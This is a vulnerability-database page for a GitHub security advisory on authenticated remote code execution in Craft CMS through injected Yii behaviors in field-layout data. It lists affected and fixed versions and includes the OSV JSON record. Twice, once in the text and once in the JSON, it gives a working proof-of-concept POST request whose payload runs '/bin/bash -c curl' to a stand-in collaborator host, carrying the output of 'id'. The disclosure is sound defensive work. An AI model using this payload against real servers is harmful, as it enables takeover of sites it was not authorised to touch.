GHSA-QRGM-P9W5-RRFW

Vulnerability from github – Published: 2026-05-06 17:54 – Updated: 2026-05-13 16:29
VLAI?
Summary
Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior
Details

We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server. Yii’s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.

This is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.

The request-controlled condition field layouts data is converted into a live FieldLayout object without a Component::cleanseConfig() boundary. Because Craft configures models before parent::__construct(), attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.

This appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.

We were able to reproduce the attack by issuing a POST request to /admin/actions/element-search/search with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same beforeAction() path. This results in a curl request to the chosen server with the result of the command “id” for the web user being appended to the path:

``` POST /admin/actions/element-search/search HTTP/2 Host: hostnamehere Cookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...; Content-Length: … User-Agent: Mozilla/5.0 X-Csrf-Token: ... Accept: application/json Content-Type: application/json

{

"elementType": "craft\elements\Category", "siteId": 1, "search": "", "condition": { "class": "craft\elements\conditions\ElementCondition", "elementType": "craft\elements\Category", "fieldLayouts": [ { "as rce": { "__class": "yii\behaviors\AttributeTypecastBehavior", "__construct()": [ { "attributeTypes": { "typecastBeforeSave": [ "Psy\Readline\Hoa\ConsoleProcessus", "execute" ] }, "typecastBeforeSave": "/bin/bash -c \"curl [https://yourcollaboratorservergoeshere/id](https://yourcollaboratorservergoeshere/%60id%60/)"" } ] }, "on *": "self::beforeSave" } ] } } ```

Resources

https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3

Severity ?
8.6 (High)
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.17.12"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "craftcms/cms"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "5.0.0"
            },
            {
              "fixed": "5.9.18"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-44011"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-470",
      "CWE-479"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-05-06T17:54:06Z",
    "nvd_published_at": "2026-05-12T21:16:15Z",
    "severity": "HIGH"
  },
  "details": "We identified a vulnerability in the latest version of Craft CMS which contains an input-handling flaw in a Yii object creation path that let any authenticated user inject malicious configuration and execute arbitrary commands on the server.  Yii\u2019s dynamic object configuration, as implemented in Craft CMS, is a feature that lets the application build parts of itself from a settings list.\n\nThis is largely a continuation of https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5, but through a different path that was not mitigated in the original.\n\nThe request-controlled condition field layouts data is converted into a live FieldLayout object without a `Component::cleanseConfig()` boundary. Because Craft configures models before `parent::__construct()`, attacker-controlled special config keys can take effect during object creation, and FieldLayout initialization then triggers a same-request event.\n\nThis appears to be another variant of the recent object-config / behavior-injection bug family, but via the condition / field layout hydration path.\n\nWe were able to reproduce the attack by issuing a POST request to `/admin/actions/element-search/search` with the following JSON from any connected user. Other routes can be exploited in the same way, including the rest of the element-indexes actions that pass through that same `beforeAction()` path. This results in a curl request to the chosen server with the result of the command \u201cid\u201d for the web user being appended to the path:\n\n ```\nPOST /admin/actions/element-search/search HTTP/2\nHost: hostnamehere\nCookie: CraftSessionId=...; 1234123412341234_identity=...; CRAFT_CSRF_TOKEN=...;\nContent-Length: \u2026\nUser-Agent: Mozilla/5.0\nX-Csrf-Token: ...\nAccept: application/json\nContent-Type: application/json\n\n{\n\n  \"elementType\": \"craft\\\\elements\\\\Category\",\n  \"siteId\": 1,\n  \"search\": \"\",\n  \"condition\": {\n    \"class\": \"craft\\\\elements\\\\conditions\\\\ElementCondition\",\n    \"elementType\": \"craft\\\\elements\\\\Category\",\n    \"fieldLayouts\": [\n      {\n        \"as rce\": {\n          \"__class\": \"yii\\\\behaviors\\\\AttributeTypecastBehavior\",\n          \"__construct()\": [\n            {\n              \"attributeTypes\": {\n                \"typecastBeforeSave\": [\n                  \"Psy\\\\Readline\\\\Hoa\\\\ConsoleProcessus\",\n                  \"execute\"\n                ]\n              },\n              \"typecastBeforeSave\": \"/bin/bash -c \\\"curl [https://yourcollaboratorservergoeshere/`id`\\](https://yourcollaboratorservergoeshere/%60id%60/)\"\"\n            }\n          ]\n        },\n        \"on *\": \"self::beforeSave\"\n      }\n    ]\n  }\n}\n```\n\n## Resources\n\nhttps://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3",
  "id": "GHSA-qrgm-p9w5-rrfw",
  "modified": "2026-05-13T16:29:16Z",
  "published": "2026-05-06T17:54:06Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-255j-qw47-wjh5"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/security/advisories/GHSA-qrgm-p9w5-rrfw"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44011"
    },
    {
      "type": "WEB",
      "url": "https://github.com/craftcms/cms/commit/ab85ca7f5f926994f723f60584054a1f4c4c5de3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/craftcms/cms"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Craft CMS has Potential Authenticated Remote Code Execution via Malicious Attached Behavior"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.